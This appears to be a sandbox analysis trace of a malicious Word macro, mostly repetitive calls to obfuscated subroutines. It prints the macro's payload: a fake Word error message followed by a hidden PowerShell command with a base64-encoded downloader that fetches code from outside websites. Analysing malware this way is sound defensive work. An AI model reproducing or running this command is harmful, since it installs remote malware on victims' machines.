Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
LzxxRHG
Close
EKezHIC
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
DpYbmDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hDJDJ
Close
dXiwA
CreateObject	CreateObject("winmgmts:win32_process")
hFSyAfFrF
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
hXxQDACJA
Close
xkQqDXCcD
Mid
Len	Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689
lBenBDA
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UavHTIBHo
Close
IcAHwPH
BNmrm
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
FLtYjKHC
Close
qAUhkIMz
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArAC